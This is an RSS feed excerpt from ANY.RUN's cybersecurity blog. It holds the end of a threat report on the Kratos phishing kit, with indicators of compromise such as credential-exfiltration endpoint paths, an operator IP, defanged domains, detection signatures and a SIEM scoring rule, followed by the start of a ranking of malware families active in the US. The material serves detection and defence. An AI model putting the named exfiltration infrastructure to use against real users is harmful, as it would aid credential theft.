<li>styles.css = c447e75f1029ed7a5882add16bcd13ad44be3bd47c93c830ff39185e23d25ebb&nbsp;</li>
</ul>



<p class="wp-block-paragraph">The styles.css&nbsp;hash&nbsp;connects&nbsp;636&nbsp;tasks&nbsp;across&nbsp;V1&nbsp;and&nbsp;V2.&nbsp;</p>



<h3 class="wp-block-heading"><strong>3.&nbsp;Exfiltration&nbsp;Endpoints</strong>&nbsp;</h3>



<ul class="wp-block-list">
<li><strong>V0:</strong>&nbsp;*/SOft/mini.php&nbsp;</li>



<li><strong>V1:</strong>&nbsp;*/next.php, */nex.php, */n3xt.php, */officers*eur.php&nbsp;</li>



<li><strong>V2:</strong>&nbsp;*/save.php&nbsp;</li>
</ul>



<h3 class="wp-block-heading"><strong>4.&nbsp;Existing&nbsp;ANY.RUN Engine&nbsp;Signatures</strong>&nbsp;</h3>



<p class="wp-block-paragraph">These&nbsp;signatures&nbsp;can&nbsp;already&nbsp;be&nbsp;used&nbsp;to&nbsp;trigger&nbsp;retrospective&nbsp;detection:&nbsp;</p>



<ul class="wp-block-list">
<li>PHISHING [ANY.RUN]&nbsp;Kratos&nbsp;related&nbsp;URL&nbsp;chain&nbsp;observed&nbsp; (M1 / M2 / M3 /&nbsp;Docusign&nbsp;Variant)&nbsp;</li>



<li>PHISHING [ANY.RUN]&nbsp;Kratos&nbsp;exfil&nbsp;activity&nbsp;observed&nbsp;(M1)&nbsp;— /next.php&nbsp;</li>



<li>PHISHING [ANY.RUN]&nbsp;Kratos&nbsp;exfil&nbsp;HTTP&nbsp;activity&nbsp;observed&nbsp;— /SOft/mini.php&nbsp;</li>



<li>NOALERT [ANY.RUN]&nbsp;Xbit&nbsp;Setter&nbsp;for&nbsp;barr.svg&nbsp;/&nbsp;lg.svg&nbsp;/ ani.gif / bg.png&nbsp;</li>
</ul>



<h3 class="wp-block-heading"><strong>5. In-Browser Data Investigation</strong>&nbsp;</h3>



<p class="wp-block-paragraph">ANY.RUN’s in-browser data investigation helps analysts confirm how the phishing page behaves after it loads. Inside the&nbsp;sandbox, they can inspect the page code, loaded assets, DOM changes, redirects, and network requests without relying only&nbsp;on the&nbsp;initial&nbsp;page appearance.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="551" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-In-browser-data-investigation-1024x551.webp" alt="Kratos in-browser data investigation" class="wp-image-22347" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-In-browser-data-investigation-1024x551.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-In-browser-data-investigation-300x161.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-In-browser-data-investigation-768x413.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-In-browser-data-investigation-1536x827.webp 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-In-browser-data-investigation-370x199.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-In-browser-data-investigation-270x145.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-In-browser-data-investigation-740x398.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Kratos-In-browser-data-investigation.webp 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Kratos in-browser data investigation</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">&nbsp;For Kratos, this makes it possible to see:&nbsp;</p>



<ul class="wp-block-list">
<li>The&nbsp;submitData()&nbsp;function and the&nbsp;di&nbsp;and&nbsp;pr&nbsp;parameters&nbsp;</li>



<li>POST requests to endpoints such as&nbsp;next.php&nbsp;or&nbsp;save.php&nbsp;</li>



<li>Password-attempt handling&nbsp;through the&nbsp;#pass-err&nbsp;element&nbsp;</li>



<li>Redirects to predefined destinations such as&nbsp;office.com&nbsp;</li>



<li>Obfuscated scripts and the logic used to send stolen credentials&nbsp;</li>
</ul>



<p class="wp-block-paragraph">This browser-level view helps confirm that the page is part of the Kratos family and gives analysts evidence they can use for triage, hunting, and response.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Cut phishing triage time with browser-level evidence.  </span><br>
Confirm threats faster and reduce business risk.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kratos-phaas-account-takeover&amp;utm_term=140726&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Speed Up Phishing Response  </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading"><strong>6. Behavioral Indicators</strong>&nbsp;</h3>



<p class="wp-block-paragraph">Additional&nbsp;behavioral signs include:&nbsp;</p>



<ul class="wp-block-list">
<li>Cloudflare Turnstile, identified as&nbsp;challengepoint&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>DOMPurify&nbsp;3.2.6&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>The&nbsp;<strong>“Fake Microsoft Authentication Page”</strong>&nbsp;incident&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>WebSocket activity in some analysis sessions&nbsp;</li>
</ul>



<p class="wp-block-paragraph">WebSocket activity should be treated as a risk indicator, not as proof of an&nbsp;AiTM&nbsp;attack.&nbsp;</p>



<h2 class="wp-block-heading">SIEM&nbsp;Scoring&nbsp;Rule&nbsp;</h2>



<p class="wp-block-paragraph">Instead of using a simple binary match, apply a cumulative scoring model to assign confidence levels:</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-346"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="8"
           data-wpID="346"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Indicator                     </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Score                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        barr.svg + lg.svg for V1, or dsa.svg + sid.gif + imag.jpg for V2                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        +80                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Matching asset content hash                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        +80                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        POST request to next.php, save.php, or officers*.php for V1/V2, or */PTT/SOft/mini.php for V0                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        +35                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        “Fake Microsoft auth,” page title Authentication, or Einvoice Beta footer                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        +30                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Turnstile displayed before the login form                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        +15                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Lure delivered through SharePoint, an email gateway, or Microsoft Forms                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        +10                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Tags associated with another kit, such as stealc, vidar, clickfix, tycoon, or sneaky2fa                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        −80                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-346'>
table#wpdtSimpleTable-346{ table-layout: fixed !important; }
table#wpdtSimpleTable-346 td, table.wpdtSimpleTable346 th { white-space: normal !important; }
</style>




<h2 class="wp-block-heading">Recommendations&nbsp;for&nbsp;Defenders&nbsp;</h2>



<p class="wp-block-paragraph">Use&nbsp;a&nbsp;tiered&nbsp;response&nbsp;model&nbsp;instead&nbsp;of&nbsp;blocking&nbsp;everything&nbsp;by&nbsp;default.&nbsp;</p>



<h3 class="wp-block-heading"><strong>Infrastructure Response</strong>&nbsp;</h3>



<ul class="wp-block-list">
<li><strong>Disposable attacker-controlled domains</strong>, including DGA domains, should be blocked.</li>



<li><strong>Shared parent domains</strong> such as crm-technik.de, klenpare.com, and uvarnix.cfd should be blocked only after review, as they may also host legitimate subdomains.</li>



<li><strong>Compromised legitimate websites</strong> should be reported for takedown rather than blocked outright.</li>



<li><strong>Cloudflare edge infrastructure and broad ASNs</strong> should be monitored, not blocked.</li>
</ul>



<h3 class="wp-block-heading"><strong>Response&nbsp;to&nbsp;Account&nbsp;Compromise</strong>&nbsp;</h3>



<p class="wp-block-paragraph">The&nbsp;response&nbsp;should&nbsp;also&nbsp;depend&nbsp;on&nbsp;the&nbsp;type&nbsp;of&nbsp;credential&nbsp;theft&nbsp;observed.&nbsp;</p>



<ul class="wp-block-list">
<li>For a basic credential harvester, reset the user’s password and verify their MFA settings.</li>



<li>For confirmed or likely AiTM activity, such as reverse-proxy behavior, spoofing of login.microsoftonline.com, cookie or session relaying, or a suspicious authentication-relay endpoint, revoke activesessions and refresh tokens.</li>
</ul>



<p class="wp-block-paragraph">A&nbsp;password&nbsp;reset&nbsp;alone&nbsp;may&nbsp;not&nbsp;be&nbsp;enough&nbsp;if&nbsp;the&nbsp;attacker&nbsp;has&nbsp;already&nbsp;obtained&nbsp;a&nbsp;valid&nbsp;session.&nbsp;</p>



<h3 class="wp-block-heading"><strong>Email&nbsp;and&nbsp;Link Analysis</strong>&nbsp;</h3>



<p class="wp-block-paragraph">Analyze suspicious links using both static verdicts and observed behavior. Train employees not to open suspicious links and to submit them to the internal security team for review.</p>



<p class="wp-block-paragraph">When needed, use the ANY.RUN interactive sandbox to investigate the link safely. Never enter real authentication credentials during analysis.</p>



<h2 class="wp-block-heading">Recommendations&nbsp;for&nbsp;CISOs&nbsp;and&nbsp;SOC&nbsp;Leaders&nbsp;</h2>



<p class="wp-block-paragraph">Kratos shows how credential phishing can remain visible as isolated detections without being understood as a wider operation. Security leaders should make sure their teams can connect technical evidenceto business risk and take consistent action before one compromised account becomes a broader incident.</p>



<ul class="wp-block-list">
<li><strong>Measure time to confident attribution, not only time to detection.</strong> Detecting phishing is important, but linking related activity helps teams understand campaign scale, affected users, and business exposure.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Add browser-level investigation to phishing workflows.</strong> Give analysts visibility into page code, redirects, DOM changes, and credential-exfiltration behavior that may not appear in static analysis.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Define separate response playbooks for credential harvesting and AiTM activity.</strong> Password resets may be enough for a basic harvester, while suspected session theft requires session and refresh-token revocation.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Turn Kratos indicators into repeatable controls.</strong> Add asset fingerprints, hashes, exfiltration endpoints, and confidence scoring to SIEM, SOAR, and retrospective hunting workflows.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Avoid broad infrastructure blocking.</strong> Shared cloud, Cloudflare, and compromised legitimate domains require targeted review to reduce disruption and unnecessary business impact.</li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Turn phishing evidence into faster, more consistent response.    </span><br>
Reduce account takeover without disrupting legitimate activity.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kratos-phaas-account-takeover&amp;utm_term=140726&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Strengthen Phishing Response  </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Conclusion&nbsp;</h2>



<p class="wp-block-paragraph">Kratos shows how a single stolen Microsoft 365 account can create wider business risk, from fraud and data exposure to costly incident response. Its repeatable assets and infrastructure patterns givesecurity teams a practical way to detect the kit earlier, connect related activity, and respond with greater confidence.</p>



<p class="wp-block-paragraph">By combining sandbox analysis, browser-level evidence, and family-level attribution, organizations can reduce investigation time, avoid unnecessary blocking, and contain account compromise before itdevelops into a larger incident.</p>



<h2 class="wp-block-heading">About&nbsp;ANY.RUN&nbsp;</h2>



<p class="wp-block-paragraph">ANY.RUN, a leading provider of interactive malware analysis and&nbsp;threat&nbsp;intelligence solutions, helps organizations investigate&nbsp;threats&nbsp;faster&nbsp;and make&nbsp;response decisions based on clear&nbsp;behavioral evidence.&nbsp;&nbsp;</p>



<p class="wp-block-paragraph">Its solutions include the&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kratos-phaas-account-takeover&amp;utm_term=140726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive&nbsp;Sandbox</a>&nbsp;for enterprise-scale malware and phishing analysis, along with&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kratos-phaas-account-takeover&amp;utm_term=140726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a>&nbsp;products built on investigation data from more than 15,000 organizations. This intelligence helps security teams enrich alerts, uncover active&nbsp;threats earlier, and add relevant context to detection, investigation, and&nbsp;response workflows.&nbsp;&nbsp;</p>



<p class="wp-block-paragraph">ANY.RUN is&nbsp;<a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kratos-phaas-account-takeover&amp;utm_term=140726&amp;utm_content=linktocomliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II attested</a>,&nbsp;demonstrating&nbsp;its commitment to strong security controls and customer data protection. For SOCs, MSSPs, and enterprise security teams, the platform helps reduce investigation uncertainty, accelerate triage, and turn&nbsp;threat&nbsp;analysis into actionable findings.&nbsp;</p>



<h2 class="wp-block-heading">IOCs&nbsp;and&nbsp;Artifacts&nbsp;</h2>



<ul class="wp-block-list">
<li><strong>Fingerprint:</strong>&nbsp;*/assets/img/barr.svg&nbsp;+ */assets/img/lg.svg&nbsp;for&nbsp;V1; *dsa.svg&nbsp;+ *sid.gif + *imag.jpg&nbsp;for&nbsp;V2&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Exfiltration:</strong>&nbsp;*/next.php, */save.php, */officers*eur.php,&nbsp;and&nbsp;POST&nbsp;requests&nbsp;to&nbsp;*/PTT/SOft/mini.php&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Early&nbsp;domain:</strong>&nbsp;dwbud.vilaribit.com&nbsp;for&nbsp;V0 (/PTT/SOft)&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Operator&nbsp;IP:</strong>&nbsp;41.128.0.142 (Egypt)&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>abal[.]my&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>starwellmedia[.]com&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>aabiz[.]de&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>aspireglobal[.]ltd&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>buenne[.]de&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>dufllot[.]sbs&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>enerdizerandtron[.]de&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>espaciocf[.]de&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>ihrsupportcenter[.]de&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>ilersls[.]org&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>aaalen[.]de&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>rundwasser[.]de&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>smartcontrolengineer[.]com&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>sonnenbrillenspot[.]de&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>trisrnareprjdocz[.]com&nbsp;</li>
</ul>
<p>The post <a href="https://any.run/cybersecurity-blog/kratos-phaas-account-takeover/">​​Kratos PhaaS Targets US and EU: How to Reduce Microsoft 365 Account Takeover Risk​</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/kratos-phaas-account-takeover/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>US Threat Landscape Alert: 30 Active Malware Families Ranked by Real Sandbox Data</title>
		<link>https://any.run/cybersecurity-blog/usa-top-30-threats-2026/</link>
					<comments>https://any.run/cybersecurity-blog/usa-top-30-threats-2026/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Thu, 09 Jul 2026 11:19:16 +0000</pubDate>
				<category><![CDATA[Cybersecurity Lifehacks]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[malware behavior]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=22003</guid>

					<description><![CDATA[<p>State of Cybersecurity in the US&#160; American organizations are processing more malware submissions than ever, and the mix keeps shifting under their feet. Phishing kits that hijack multi-factor authentication now sit alongside decades-old ransomware, commodity RATs sold for the price of a streaming subscription, and loaders built to slip payloads past EDR undetected. For CISOs [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/usa-top-30-threats-2026/">US Threat Landscape Alert: 30 Active Malware Families Ranked by Real Sandbox Data</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<h2 class="wp-block-heading">State of Cybersecurity in the US&nbsp;</h2>



<p class="wp-block-paragraph">American organizations are processing more malware submissions than ever, and the mix keeps shifting under their feet. Phishing kits that hijack multi-factor authentication now sit alongside decades-old ransomware, commodity RATs sold for the price of a streaming subscription, and loaders built to slip payloads past EDR undetected. </p>



<p class="wp-block-paragraph">For CISOs and SOC leaders, the challenge isn&#8217;t a lack of data — it&#8217;s knowing which of the hundreds of active families deserve budget, detection engineering time, and executive attention this month, not last quarter. </p>



<p class="wp-block-paragraph">This breakdown is built on real-time data from ANY.RUN&#8217;s <a href="https://any.run/malware-trends/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=usa-top-30-threats-2026&amp;utm_term=090726&amp;utm_content=mtt" target="_blank" rel="noreferrer noopener">Malware Trends Tracker (MTT)</a>, which ranks malware families by actual analysis volume rather than vendor surveys or annual retrospectives. The result is a live snapshot of what&#8217;s actually landing in American inboxes and endpoints right now. </p>



<h2 class="wp-block-heading">Key Takeaways</h2>



<ul class="wp-block-list">
<li><strong>MFA alone no longer stops account takeover</strong>. Five of the top ten US threats this month are phishing kits built specifically to steal session cookies or OAuth tokens after MFA succeeds, not to guess passwords.</li>



<li><strong>Device-code phishing is the newest board-level risk</strong>. Kali365 and EvilTokens abuse Microsoft&#8217;s legitimate device-authorization flow, meaning victims complete a real login on a real Microsoft page while attackers walk away with a valid token.</li>



<li><strong>&#8220;Retired&#8221; malware isn&#8217;t retired</strong>. WannaCry and Emotet still show active monthly volume years after their most infamous incidents — a direct signal that legacy, unpatched exposure remains live exposure.</li>



<li><strong>Commodity doesn&#8217;t mean low-risk</strong>. Cheap, widely available stealers and RATs (AsyncRAT, Vidar, XWorm, Stealc, RedLine, Formbook) account for a large share of monthly volume precisely because low cost keeps them in constant circulation.</li>



<li><strong>Law enforcement takedowns shift the market, they don&#8217;t shrink it</strong>. RedLine, Lumma, and the AiTM phishing ecosystem all show the same pattern: disrupt one operator, and a successor (Remus Stealer, FlowerStorm) absorbs the demand within weeks.</li>



<li><strong>Some detections are early ransomware warnings, not isolated events</strong>. Cobalt Strike beacons, Qbot infections, and DonutLoader activity have historically preceded ransomware deployment — treating them as urgent, not routine, is a high-leverage SOC decision.</li>



<li><strong>Live, region-specific data beats annual retrospectives</strong>. Pairing Threat Intelligence Lookup for instant indicator-to-campaign context with Threat Intelligence Feeds for continuously updated blocklists lets security teams act on what&#8217;s happening in the US right now, rather than reacting to what already happened last quarter.</li>
</ul>



<h2 class="wp-block-heading">Biggest Malware Threats in America&nbsp;</h2>



<p class="wp-block-paragraph">Three patterns stand out in the current US ranking. First, <strong>phishing-as-a-service (PhaaS) kits — Sneaky 2FA, EvilTokens, EvilProxy, Kali365, FlowerStorm, Tycoon 2FA</strong> — now occupy five of the top ten spots, a sign that credential and session-token theft has overtaken malware delivery as the fastest path into a corporate network. </p>



<p class="wp-block-paragraph"><strong>Second, commodity RATs and stealers (AsyncRAT, Vidar, XWorm, Stealc, RedLine, Lumma)</strong> remain in constant, high-volume circulation because they&#8217;re cheap, effective, and endlessly repackaged. </p>



<p class="wp-block-paragraph"><strong>Third, &#8220;retired&#8221; threats never really retire: Emotet and WannaCry</strong> both still register meaningful monthly activity years after their headline-grabbing debuts, a reminder that legacy exposure is still active exposure. </p>



<h2 class="wp-block-heading">US Phishing Attack Trends&nbsp;</h2>



<p class="wp-block-paragraph"><a href="https://any.run/phishing/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=usa-top-30-threats-2026&amp;utm_term=090726&amp;utm_content=linktophishing" target="_blank" rel="noreferrer noopener">Phishing</a> has changed its shape. The kits topping this month&#8217;s US data don&#8217;t rely on misspelled domains or obvious fake login pages — they abuse legitimate authentication flows. <strong>Kali365 and EvilTokens</strong> exploit Microsoft&#8217;s device-code authorization flow to capture OAuth tokens after a victim completes real MFA on Microsoft&#8217;s real infrastructure. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Lower your risk from today&#8217;s most active malware and phishing campaigns.</span><br>
Explore ANY.RUN&#8217;s threat intelligence solutions.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=usa-top-30-threats-2026&#038;utm_term=090726&amp;utm_content=linktoenterprise/#contact-sales" rel="noopener" target="_blank">
Reduce Exposure</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph"><strong>Sneaky 2FA, EvilProxy, Tycoon 2FA, and FlowerStorm</strong> run adversary-in-the-middle (AiTM) reverse proxies that harvest session cookies the instant a user logs in. In every case, the defender-facing lesson is the same: credential hygiene and MFA prompts alone no longer stop account takeover. Security teams need visibility into session and token abuse, not just password exposure.</p>



<h2 class="wp-block-heading">What Is ANY.RUN&#8217;s Malware Trends Tracker?&nbsp;</h2>



<p class="wp-block-paragraph"><a href="https://any.run/malware-trends/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=usa-top-30-threats-2026&amp;utm_term=090726&amp;utm_content=mtt">Malware Trends Tracker</a> (MTT) is ANY.RUN&#8217;s free, continuously updated service that tracks the popularity and behavior of malware families in the wild. It draws its data directly from ANY.RUN&#8217;s <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=usa-top-30-threats-2026&amp;utm_term=090726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>, where a global community of analysts submits and detonates suspicious files and URLs every day. Every submission that returns a malicious or suspicious verdict feeds into MTT&#8217;s rankings, giving the tracker a real-time pulse on what threat actors are actually deploying. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="572" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-1024x572.png" alt="" class="wp-image-22022" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-1024x572.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-300x168.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-768x429.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-370x207.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-270x151.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-740x414.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1.png 1249w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Top malware this month by MTT</figcaption></figure>



<p class="wp-block-paragraph">Analysts can filter by country, malware type (phishing kit, RAT, stealer, ransomware, loader, botnet, and more), and specific family, which is what makes it possible to isolate a view like &#8220;<em>the 30 most active threats hitting the United States in the last 30 days</em>.&#8221; That granularity turns raw sandbox telemetry into something SOC teams and business leaders can act on: proactive blocklist updates, sharper detection rules, and threat modeling grounded in what&#8217;s actually happening in their region rather than global averages that may not reflect their exposure. </p>



<h2 class="wp-block-heading">How ANY.RUN Helps You Detect and Understand Threats&nbsp;</h2>



<p class="wp-block-paragraph">Knowing which malware families are trending in the US is only half the equation. The other half is being able to move fast when one of them shows up in your environment — and to understand the broader campaign behind it before it becomes an incident.&nbsp;</p>



